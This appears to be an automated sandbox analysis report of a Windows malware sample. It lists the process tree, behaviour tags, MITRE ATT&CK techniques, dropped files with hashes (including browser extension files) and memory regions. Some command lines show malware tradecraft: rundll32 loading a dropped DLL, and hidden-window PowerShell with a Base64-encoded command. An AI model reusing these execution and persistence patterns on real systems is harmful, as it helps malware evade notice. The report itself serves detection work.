C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WZpWNMsDzSAcKsSA\RAoCJVKA\GswTFey.dll",#1 /Cdido 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MRaTohzfdszDuijXP"4⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {BAAF13B2-E394-44B7-B91E-A88007F3A30E} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\NNMAoTKMcAkAC\mHHSZFU.xmlFilesize
2KB
MD5234dce548384864bd7f43151705a29c7
SHA12112f2184a297166b1f935d5d94d87b854a5b433
SHA256757fa8f728a4b1907950380eda1f759c3b1aeda612dfcde9efd2e1bfaf028a68
SHA512961caf59854293df69f3c50a880001d7a0da2460495ce820dab2c5c0539bb4373b9e403ca465c6152d8eee64f5ad30d610940bc3752fc3b00d615922d8fe0ee2
-
C:\Program Files (x86)\bBBSFQQZU\tNeCuaf.xmlFilesize
2KB
MD59b721c52ad47fd852bdd27e98f35f44e
SHA18b90f4ef51b891a7956be458b474cafd63c53a84
SHA2562c38459e5a9cee83a3190bb2eb2b617a77b16bd1d72262b8fdd8dba481df6ac6
SHA5129612f1b2d3c343d69e0629e091368e14ee7bae85ec54ffc0fa739fb439570115908113b0af6b3514c462bfc02a4c3644db36570498bed5be84c42bf634f9ef53
-
C:\Program Files (x86)\rPikKiIbwrQGukIChiR\ZBRqrHq.xmlFilesize
2KB
MD591d65eb0141b4a739b6b99c1030c8878
SHA1859f74f1bc290aef52e0c0b7b9ec7b12438d7769
SHA25660815aa912f989fdee0b68462792bb7708a314e9871750e72099034fe1f5f5c6
SHA5127c2fc04314035e01e64bb40403a4fc70b3fde43704e32c328d4d46da389a418345ca1ed18e14834ba0f112e15a0f9a4068cb1d1fe7f646d029a4596a14cbd970
-
C:\Program Files (x86)\rUfZlqUIdWiU2\nhOLsiW.xmlFilesize
2KB
MD5b6eb90164500de2ed33cd3bff6d90716
SHA1811e43beb9bb04f7f30e2d3058f509e0fb027d32
SHA2560c27dc8315529d37d8895fce8efcd9fb0efa2c71b47d654633ce638f089ffc9c
SHA5125430c249f5f207b01e44854b47727b06ef6a74275ac28e786d46604b264ff39a19ba736cecb9b9655dafd38fdd64738a876969d5b950aec93dd516f128588942
-
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpiFilesize
2.0MB
MD51cea7dfe1bfaaebc5b6ac123036c1893
SHA154aae0951f23eba9df4d25f6d5d8aff6e47a68cb
SHA25650a4fc4a73700e46223b5ce324801cbaa0e57e626d1f2f4ea7856f124b11cbda
SHA5120b9bfa89b6a9d783c42fc517a06030b8861533f9a6037e53a558036c8e6817ac02f6f30613747ea282eb0616723ed5a43f0c5591af99d1edec62cc531c69e755
-
C:\ProgramData\fHdtCMTPryqSDgVB\jKLfQGL.xmlFilesize
2KB
MD59ed8406e38c0a9e296da16af6f36118d
SHA10f92f57d58d74b03a79862e098e5543b73d098a5
SHA2560723c6705ba2a454912c55eaefdb23cacb188f2ff7c166f84d057f0d3cb2727a
SHA51255dd1764b6e4b29ab30a47d9b89ac29d5a17c4a3e344fe970f755d0429dd7e14de722a475462039e8ba43eb2fc6284d41f5d2ba7431a88b80e974d79f920b6e1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
10KB
MD5c426b2502892d4e340b21449bec5e90a
SHA14a00c8cced82927ecd5f68d79a69331a388560e0
SHA25690c1f0f519a5b097cb96608d25f54278e7ef39029a63c97c86ac02aabe1a26c9
SHA512efd1132e1085f7a4a317eb27091f1836a797ebbaa55b51019c294a77bb2bf8ee49ecdab74e9d75cf6094699d9cc658e0fc1880ba6d461052e98391da6aa0b3c5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD56ef179b335880f3111125dac66058497
SHA1705e913bbe34e199aa6520bbbb467c3ee65c75fa
SHA25657cbcaa9f37a0379397a5d4b44dc02877bd84aee7dfa86ee5604b796a05a7880
SHA51243fb6ddfb94811b1f2ae093b7ab3c315f0d7c29aa17c6f54ef0b10ea5b2c1209ad17eb2dc50c6cc3617e95a76d488aaec4bdc62ffe65e9e3008d8c8948014383
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WNKLECLQS957JQ7QC9PQ.tempFilesize
7KB
MD52a6d9c42f4184cba87426df73f9477a1
SHA17b9388212aa59bd9ba60455dcd18544f7e92eb1f
SHA25601d5e975ef3818bff5d7366e59e60a6e0b7c904091690ecd9b5ca2e8b5cbc7e1
SHA512015f70b0578310033b20ec20d17f1376700853697c01fe06f6c75dc234b943ae4e0aa5f6d6e5f995ca2f90e9f1c7c38a8bf4ef8e41f0f8cc3e19c50322abf6ad
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ty9peokp.default-release\prefs.jsFilesize
7KB
MD5346531dada79c55e04183850053ee16e
SHA1b4c2158b1729743cdf6bf8440abef6d9c3e63b6e
SHA2563d4418ea4813a2747c970ad8ba118cf97bbf4ef5e05654a6fd07641fd0e837d4
SHA5120780db8b562b74a292e85dede83f51eeadbe83d0e02923b40231188a2eb0038af1ac9a3b71476c2cfad2327a7ab561595abfbb4d926abf4cfd44956f95b424fa
-
C:\Windows\Temp\WZpWNMsDzSAcKsSA\QwckKSdo\QbDpVplGXUoBWCma.wsfFilesize
9KB
MD5b4eafe6027777d757f5db7c5ba16ccb1
SHA1ad7dc2bfa0f5f8ecc489b97ae4f183692cb7f066
SHA256c66e77b341a1159910e0fc19bf515e7acf9981ba357d782434d6875ce5b55890
SHA51226c178b1b0aa919e768a01551c7113830c39ee8d0f937996ff9c161ede3c91f86c7394c0bceb939813a604271d5e143d690af36c4c48d3a4a065c55caf9cedd3
-
C:\Windows\Temp\WZpWNMsDzSAcKsSA\RAoCJVKA\GswTFey.dllFilesize
6.5MB
MD52c5315f48e9b097d2c447e016743854f
SHA184006269f2b54df8bef71d46364bd82946b24759
SHA256233a6dfcb0ea347aed469bac784313ce0fb0dbc2ce84b5f3b3561d4741b03dc2
SHA512efd65e08582051bf7ef3795f7d0718aab625ea1500eaae19b0a665807b697e81a0e1dd580885765f364ab3e763ed913a19cbbe27327bc45ce0c1a0aeb65ce4ec
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
5KB
MD53d52426af4887c43abd62ceb79d16e53
SHA13a4ca1704f691c6ad644b15aca9451e2a5556aee
SHA2561f3929e095ff6be934e2ea77c3e52f4dd2c6c0578753b90a03b2190dacc0b5b9
SHA5122059e2e6d5e964055a53817f3aaa491113cd467c593b9c3403e0de9f5a0359cfb2b18613e570fe792d2df5af74cfa9f16b7a2336cd8e148a35bd87e14322fd44
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\7zS17F4.tmp\Install.exeFilesize
6.4MB
MD5fa6c8a4dcc2b50d9ecce866e6bf6bf82
SHA104f4665baccd0ada23349e69b93a1ebad7571a80
SHA25613fec9b387fb25d13e8247a2efc8c45b044726d1aa24b692aac2a925b972fdff
SHA5127d452b09893f8c2cb88fa22b89c55fb07b85ef65dc22bed96be74443c2f32df1dc502a789d7f11a118c49f7044a5b273e5bd4a2d3e8d1ccd6623b6a3c43dd2e8
-
\Users\Admin\AppData\Local\Temp\7zS19A8.tmp\Install.exeFilesize
6.6MB
MD5c459c807bebcbb6553ff3388b249a9fd
SHA16e428b6c77c966e33c5c0e321d722b57bd3bf975
SHA2569c3372c448ccebbe7b771c24c207a0ae0e145a25d0e96f5ffb0559ff5571154b
SHA5127641130d16107aa5bdf16f39a6f9e6404230376bae4a9489b0b9462218075c4a0cea35cff3b434c6a352f05f49aca4a3f71839acf16cbe278ac49235ca6291cf
-
memory/1928-61-0x000000001B780000-0x000000001BA62000-memory.dmpFilesize
2.9MB
-
memory/1928-62-0x0000000001FF0000-0x0000000001FF8000-memory.dmpFilesize
32KB
-
memory/2192-355-0x0000000001660000-0x000000000522B000-memory.dmpFilesize
59.8MB
-
memory/2660-24-0x0000000001230000-0x00000000018D5000-memory.dmpFilesize
6.6MB
-
memory/2660-27-0x0000000010000000-0x0000000013BCB000-memory.dmpFilesize
59.8MB
-
memory/2660-26-0x0000000001230000-0x00000000018D5000-memory.dmpFilesize
6.6MB
-
memory/2660-25-0x0000000001230000-0x00000000018D5000-memory.dmpFilesize
6.6MB
-
memory/2660-36-0x00000000000E0000-0x0000000000785000-memory.dmpFilesize
6.6MB
-
memory/2660-23-0x00000000000E0000-0x0000000000785000-memory.dmpFilesize
6.6MB
-
memory/2660-37-0x0000000001230000-0x00000000018D5000-memory.dmpFilesize
6.6MB
-
memory/2832-35-0x00000000023F0000-0x0000000002A95000-memory.dmpFilesize
6.6MB
-
memory/2832-22-0x00000000023F0000-0x0000000002A95000-memory.dmpFilesize
6.6MB
-
memory/2860-82-0x0000000000CA0000-0x0000000001345000-memory.dmpFilesize
6.6MB
-
memory/2860-130-0x0000000001A90000-0x0000000001AF0000-memory.dmpFilesize
384KB
-
memory/2860-97-0x0000000001920000-0x00000000019A5000-memory.dmpFilesize
532KB
-
memory/2860-84-0x0000000010000000-0x0000000013BCB000-memory.dmpFilesize
59.8MB
-
memory/2860-312-0x0000000002BA0000-0x0000000002C28000-memory.dmpFilesize
544KB
-
memory/2860-322-0x0000000003A80000-0x0000000003B52000-memory.dmpFilesize
840KB
-
memory/2860-354-0x0000000000CA0000-0x0000000001345000-memory.dmpFilesize
6.6MB
-
memory/2912-83-0x0000000000950000-0x0000000000FF5000-memory.dmpFilesize
6.6MB
-
memory/2912-63-0x0000000000950000-0x0000000000FF5000-memory.dmpFilesize
6.6MB
-
memory/2912-41-0x0000000010000000-0x0000000013BCB000-memory.dmpFilesize
59.8MB
-
memory/2912-40-0x0000000000950000-0x0000000000FF5000-memory.dmpFilesize
6.6MB
-
memory/3008-51-0x000000001B6D0000-0x000000001B9B2000-memory.dmpFilesize
2.9MB
-
memory/3008-52-0x0000000002290000-0x0000000002298000-memory.dmpFilesize
32KB